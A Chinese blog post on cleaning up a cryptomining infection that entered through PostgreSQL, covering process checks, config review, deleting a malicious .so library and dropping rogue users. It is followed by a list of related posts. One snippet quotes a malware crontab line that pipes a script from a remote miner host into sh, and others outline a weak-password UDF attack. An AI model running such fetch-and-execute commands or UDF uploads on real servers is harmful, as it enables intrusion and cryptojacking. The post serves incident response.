一种基于postgres的挖矿病毒处理

原创 已于 2024-12-26 16:10:56 修改 · 920 阅读 · 14 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#区块链
于 2024-12-26 16:07:27 首次发布

基于 PostgreSQL 的挖矿病毒处理

在许多网络攻击中,挖矿病毒(也称为 矿工病毒)通过利用系统资源来执行加密货币挖矿操作,从而占用大量的 CPU 和内存资源。这些病毒可能通过漏洞或未经授权的访问感染目标系统,或者通过恶意应用程序和脚本来部署。

对于基于 PostgreSQL 的挖矿病毒,处理和防御的关键是识别病毒的行为、清除潜在的恶意文件和活动,并加强系统的安全性。

处理步骤

  1. 检测系统中是否存在挖矿病毒

    • 挖矿病毒通常会占用大量 CPU 和内存资源。通过以下命令检查系统负载:

      top

      或者使用 htop 工具:

      htop

      检查是否有未知的进程正在消耗异常的资源。

    • PostgreSQL 本身不是用于加密货币挖矿的工具,但攻击者可能会利用数据库执行恶意 SQL 查询或使用数据库存储矿工的配置文件。

    • 通过以下命令检查 PostgreSQL 进程:

      ps aux | grep postgres

      查找异常的进程或未经授权的连接。

  2. 查找恶意文件和脚本

    • 恶意脚本可能会存储在数据库或 Web 根目录中。首先检查 PostgreSQL 的数据目录(通常位于 /var/lib/pgsql/10/data):

      ls -la /var/lib/pgsql/10/data

    • 如果在这些目录中发现不明文件或脚本(特别是动态库),应立即检查文件内容,查看是否包含恶意代码。

  3. 检查 PostgreSQL 配置文件

    • 挖矿病毒可能会通过修改 PostgreSQL 的配置文件(如 postgresql.conf 或 pg_hba.conf)来建立恶意连接或执行恶意操作。检查配置文件是否存在未经授权的更改, 本次病毒就是通过postgresql调用外部动态库进行加载。 

      cat /var/lib/pgsql/data/postgresql.conf

    • cat /var/lib/pgsql/data/pg_hba.conf 最好关闭所有外网IP。 只开通可信任的IP

  4. 清除病毒和修复漏洞

    • 停止 PostgreSQL 服务

      sudo systemctl stop postgresql

    • 删除恶意文件: 找到并删除所有恶意文件、脚本和配置:

      sudo rm -rf /var/lib/pgsql/10/data/gc_manager-1.so

    • 删除恶意数据库用户和表: 在 PostgreSQL 中删除不明的用户和表:

      DROP USER malicious_user;

      DROP TABLE malicious_table;

  5. 恢复正常状态

    • 恢复备份:如果有定期备份,可以将受影响的系统恢复到感染之前的状态。
    • 重新启动 PostgreSQL 服务

      sudo systemctl start postgresql

  6. 加强系统安全

        特别注意: 不要使用默认密码。 不要使用默认密码, 不要使用默认密码。

记一次公网postgresql数据库服务器被入侵为矿机的定位过程
萝卜吃鱼914的博客
09-26 3128
今天中午群里有一个群友反馈pg服务器cpu使用率高达1700%,处于好奇自己就帮着他一起定位了一下问题,以下记录一下定位问题的过程方便以后做复盘管理! 现象截图如下: 一、查看cpu情况和服务器平均负载情况得知各个cpu的使用率并不是很高呀,为什么执行top命令看到postgresql进程的cpu使用是1700%呢?没有头绪我们继续往下看 二、查看一下服务器的负载情况呢 有问题了,你服务...
消灭Linux挖矿病毒rumpostgreswk
BIG BOSS的博客
09-09 3656
病毒定时任务 sudo crontab -u postgres -l [root@master ~]# sudo crontab -u postgres -l */30 * * * * /home/postgres//home/postgres/data/./oka * */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh 删除 sudo crontab -u postgres -r
【问题记录】postgreSQL使用默认密码导致kdevtmpfsi挖矿病毒注入
UncleDong的博客
05-26 2542
3.分别kill 掉这两个进程,一定要两个都kill掉,刚开始处理的时候只kill了主进行,没有处理守护进程,导致一会又挖矿机器> 又启动开始工作,cpu 又跑到100%6.使用lsof查看该进程存在异常IP连接,比如:45.129.2.107,在服务器安全组中将该IP禁用,并重启服务器。7.最后,一定要重置系统上的所有用户密码,检查服务安全组,尤其是远程端口!由于该挖矿任务是个常见任务,因此网上很多教程,我参考的是。服务器不同,可能路径不同,可以直接用命令查找。,发现host被篡改,删除即可。
记录经历的几次服务器被黑挖矿
Young_Black的博客
08-15 342
利用DockerApi未授权命令执行创建容器,并进一步下载执行名为trace的门罗币挖矿木马。(脚本中有相关语句但是这个脚本将安装docker这句给注释了,而这个服务器没有docker环境,所以没啥用)会尝试卸载云主机安全软件,尝试结束清除其它竞品挖矿木马。(是的,还带卷的,专门有个函数kill_miner_proc())对ps,top,pstree等系统工具进行重命名和替换,进而通过劫持工具运行参数的方式,实现隐蔽挖矿改写authorized_keys设置免密登录后门。
记一次处理挖矿程序引发的postgres 连接超时
奔跑的痕迹的博客
12-26 2094
进入服务使用top 查看cpu 使用情况 使用 ll /proc/pid号 查找进程 也可以使用 lsof ps 进程名称(有的linux 需要先安装yam install lsof) 首选我的postgres是使用docker 制作的一个容器,所以先要进入这个容器 *docker exec -it 容器id /bin/bash 进入容器后在登录postgres root@f82e7d3a9755:/# su postgres postgres@f82e7d3a9755:/$ psql 然后使用
rumpostgreswk 挖矿病毒程序。杀除
王帅的博客
12-11 2286
今天阿里云发短信,说服务器发现挖矿病毒程序。我们来看看。怎么回事。 发现。postgres 用户启动了一个进程文件。这个文件,占用cpu非常高。就是他了。 我们来看看,他的启动路径在哪里? 发现。tmp下。这个config 文件,有问题。并不是postgres 的程序。 ./postgres_dm /tmp/rumpostgreswk --config=/tmp/config.json 发现这两个文件。就是病毒。 找到对应的路径。在/tmp下面。 发现这个文件夹里面很多都是异..
# 记一次自己云主机挖矿病毒排查过程
whj_study的博客
02-24 4594
这台云主机过年回家有段时间没用了。然后上去使用的时候很卡,top看了一下 这挖矿病毒把我cpu被吃光了,,, 执行命令`netstat -antlp | grep kswapd0` 查询该进程的网络信息 连接了一个荷兰的ip 找一下哪里存在这个文件`find / -name kswapd0` 或者看一下起这个进程的文件在哪里也能找到 `ls -l /proc/1559/exe` 进到这个目录看一下,病毒程序的文件目录,其中的kswapd0就是主体,另外还包含了创建计划..
比特币采矿暗影:AWS EC2 PostgreSQL宕机背后的惊天秘密
最新发布
AlienwareABC的博客
03-25 926
比特币采矿暗影:AWS EC2 PostgreSQL宕机背后的惊天秘密
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1590
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
服务器遭遇挖矿- kdevtmpfsi的处理
qq_47862162的博客
01-10 904
docker安装pg后遭遇挖矿???
rumpostgreswk 挖矿病毒程序
qq_44122254的博客
03-16 2117
朋友说他的服务器发消息有挖矿,拍完快照,给我说练练手,这算是我第一次接触挖矿 信息提示在tmp文件夹下面,进入打开进行查看,看到了提示的挖矿病毒程序 在此,同时看一下CPU的占用情况 原来学的linux操作命令,全都还给老师了,这次又现学了一下,如何查看内存的使用情况 查看内存的使用情况 Top PID:进程的ID USER:进程所有者 PR:进程的优先级别,越小越优先被执行 NI:进程Nice值,代表这个进程的优先值 VIRT:进程占用的虚拟内存 RES:进程占用的物理内存 SHR:进程使用的共享内
对于PostgreSQL弱口令植入木马试验
weixin_34252686的博客
12-04 502
2019独角兽企业重金招聘Python工程师标准>>> ...
排查PostgreSQL内存高的问题
喝醉酒的小白
01-02 2203
如果已知PostgreSQL进程的内存利用率很高,但日志没有发现问题,可以使用pg_top工具。:使用操作系统提供的工具来监测PostgreSQL服务器进程的内存使用情况,如果发现内存使用持续增长并没有释放的迹象,可能存在内存泄漏问题。:可以使用操作系统提供的工具或者第三方的监控工具来监控PostgreSQL进程的内存使用情况,及时发现内存泄漏问题。:通过模拟高并发和大量数据处理的场景,对存储过程进行压力测试和性能测试,观察内存使用是否合理,是否存在异常的增长。
PostgreSQL中的安全威胁
Auspicious航的博客
10-27 1418
现代数据库存储着各种各样的信息。数据是非常有价值的,因为像地图位置、身份证、银行账号等信息都会存放在数据库中。因此数据库中数据的安全性至关重要。 但是不幸的是,目前恶意软件,病毒和漏洞的规模巨大,数据库会面临巨大的安全威胁。PostgreSQL与其他软件一样容易受到误用,盗窃,未经授权的访问/控制等攻击。 本文主要讨论几种PostgreSQL中的安全威胁以及可以采取哪些措施来防范这些安全威胁。 1.CVE详细信息,报告和漏洞 有这样一个网站,该站点在每个供应商的基础上发布了最新的安全威胁。 P
服务器被攻击植入挖矿病毒,CPU占用高问题排查处理(.systemd-service.sh)
gottst0113的博客
03-06 2081
客户服务器遭攻击,部署的应用服务经常性被停止,服务器CPU占用居高不下,top查看如下: 可以看到第一个bash任务,占用cpu近400%,非正常的应用程序和脚本任务,多半是被植入了木马信息。 查看该进程的符号连接,发现已经是被删除的状态 /usr/bin/-bash (deleted),无法查看其启动程序的信息 查看定时任务:cat /etc/crontab,发现都是正常的应用程序定时脚本 又用 crontab -l 查看了一下,发现了异常定时任务如下,同top里的异常任务一致...
利用PostgreSQL配置不当漏洞实现
whatiwhere的博客
11-25 2170
实验目的 本节学习利用PostgreSQL配置不当漏洞实现以下操作: 利用PostgreSQL读取服务器磁盘文件 利用PostgreSQL向服务器磁盘写文件 实验工具 Navicat Premium 是一款目前互联网上最好用的可多重连接的数据库管理工具,也是navicat premium软件推出的最新版本,能够支持单一程序同时连接到MySQL、MariaDB、SQL Server、SQLite...
记一次服务器清除挖矿木马操作记录
skyfans的博客
12-24 2371
突然接到服务器告警,一台服务器的CPU已经达到了3000%,不用想,肯定是中了木马了,这完全论为了矿机了。问了一堆公司的安全砖家,都说没的救了,需要重新做系统了,但是和开发对接了下,这台服务器上存在众多重要的程序内容,无法直接重装操作系统。。。 这特么不是围栏老子呢吗? 好吧,抱着试一试的态度,我们来试一哈解决处理下吧。 1.查看现象 top 可以看到,一个进程2N6f1P,狠占CPU,占到...
一次服务器被挖矿处理解决过程
weixin_34228387的博客
07-28 1875
内网一台服务器cpu爆满,第6感猜测中了挖矿病毒,以下为cpu爆满监控图表赶紧ssh进系统,top了下,一个./x3e536747 进程占用了大量的cpu,cpu load average超过了cpu内核数,先kill掉进程,不用猜,等会肯定会继续启动,检查开放端口,发现postgresql直接对外开放的。肯定是通过这个入口***进来的;暂时关闭外网pg 5432端口;找到挖矿执行路径,都在/tm...
postgresql 弱口令 UDF 攻击
xxx的博客
05-15 2618
1.首先通过端口扫描到弱口令 postgresql 账号密码 2.UDF  自定义函数,本地首先编译制作 so 文件,并上传到服务器 参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html  gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值